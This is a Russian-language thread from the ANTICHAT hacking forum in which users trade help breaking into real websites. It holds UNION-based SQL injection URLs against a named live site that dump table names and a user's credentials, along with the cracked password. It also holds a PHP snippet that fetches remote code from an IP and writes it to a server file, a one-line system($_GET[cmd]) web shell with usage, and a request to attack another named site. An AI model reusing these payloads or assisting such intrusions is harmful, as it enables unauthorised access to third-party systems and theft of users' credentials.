ANTICHAT — форум по информационной безопасности, OSINT и технологиям

INSERT into dbo..shell (code) values (CHAR(65)+CHAR(67)....)
в ASCII переведи, если при конкатенации знаком "+" возникнут проблемы, то можно использовать функцию STUFF для конкатенации значений.

Вообещм разобрался пошел по пути создание базы запись в неё пхп скрипта и вывод в файл..
так как из за ковычек не как не хотел использовал http://www.motobit.com/util/binary-file-to-sql-hexstring.asp для перевода в хекс после этого запись в базу без проблем, но заливая туда скрипт <?php $a=file_get_contents('ip/123.txt'); $f=fopen('sqlsearch.php','a'); fputs($f,$a); fclose($f); ?> (ввиде хекса)- и после того как данные таблицы вывожу в файл ковычки автоматом почему то экранируются и получается <?php $a=file_get_contents(\'http://ip/123.txt\'); $f=fopen(\'sqlsearch.php\',\'a\'); fputs($f,$a); fclose($f); ?> после чего перейдя по ссылке сыпятся ошибки -
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in D:\AppServ\www\5.php on line 20

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in D:\AppServ\www\5.php on line 20
как это обойти?
Parse error: syntax error, unexpected ':' in D:\AppServ\www\RF\5.php on line 20

Залей просто <?system($_GET[cmd]);?> через него и рули. (site/shell.php?cmd=dir) к примеру.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

братья, простите что немного не потеме....

помогите сделать такую штуку: домен site.ru у него есть внутренняя страница, например про стройку, как сделать название страницы и в какой кодировке прописать ее в коде страницы, чтобы при переходе на данную страницу она имела такой вид: "www.site.ru/стройка" ???

что тут не так ?

это Access

Как можно расшарить вот этот сайт http://citywars.ru/?
ВРоде бы как защита слабая
(что то есть)
http://citywars.ru/photo/
... .ПОмоите что нибудь найти ->Игра начала работать только вчера

Нужна помощь с колонками!


http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,2,3,4,5,6,7/*
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,@@version,3,4,5,6,7/* тут 5.0.33
http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES--
получаю имена таблиц:
<code>» CHARACTER_SETS (0) » COLLATIONS (0) » COLLATION_CHARACTER_SET_APPLICABILITY (0) » COLUMNS (0) » COLUMN_PRIVILEGES (0) » KEY_COLUMN_USAGE (0) » ROUTINES (0) » SCHEMATA (0) » SCHEMA_PRIVILEGES (0) » STATISTICS (0) » TABLES (0) » TABLE_CONSTRAINTS (0) » TABLE_PRIVILEGES (0) » TRIGGERS (0) » USER_PRIVILEGES (0) » VIEWS (0) » cat_body (0) » cat_level (0) » cat_rubrics (0) » cat_set (0) » righttable (0) » user_group (0) » userlog (0) » usertable (0) » variables (0)</code>

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7 from+information_schema.columns+where+table_name=0 x757365727461626c65+limit+1,1/*

http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_name,usr_passw ord),3,4,5,6,7+from+usertable+limit+1,1/*

получаю Денис:876993158b491f4626155b468ffb6edc
876993158b491f4626155b468ffb6edc=zerozero
но к админике не подходит! Почему?
В user_group нашол usr_id » grp_id но колонки с пасом не нашел!

masterBlack
Колонка usr_login